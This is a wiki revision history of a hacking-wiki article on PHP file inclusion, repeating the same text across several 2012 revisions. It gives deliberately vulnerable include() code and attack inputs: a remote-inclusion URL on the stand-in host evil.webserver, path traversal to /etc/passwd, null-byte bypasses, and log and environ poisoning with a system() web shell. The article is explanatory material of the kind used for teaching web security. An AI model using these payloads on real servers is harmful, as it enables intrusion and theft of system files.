Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
<br><br />
In this example, if include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side.<br />
<br />
<br><br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. It is far more widespread than RFI but can be more difficult to exploit, subject to whatever limitations and whitelisting are in place to prevent it. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Similarly, on a linux server:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net or the /etc/passwd file in the attacker’s web browser. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code :<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7661File Inclusion2012-06-28T20:51:35Z<p>DPYJulietowbaijc: /* Remote File Inclusion */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote<br />
command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
<br><br />
In this example, if include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side.<br />
<br />
<br><br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code :<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7660File Inclusion2012-06-28T20:48:12Z<p>DPYJulietowbaijc: /* Remote File Inclusion */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote<br />
command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
<br><br />
If include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side.<br />
<br />
<br><br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code :<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7659File Inclusion2012-06-28T20:44:17Z<p>DPYJulietowbaijc: /* Remote File Inclusion */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote<br />
command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
If include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side, allowing for abritrary code execution.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code :<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7658File Inclusion2012-06-28T20:40:04Z<p>DPYJulietowbaijc: /* Remote File Inclusion */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote<br />
command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to including a file that resides outside of the target site. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
If include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side, allowing for abritrary code execution.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code :<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7657File Inclusion2012-06-28T20:32:23Z<p>DPYJulietowbaijc: /* Introduction */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote<br />
command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
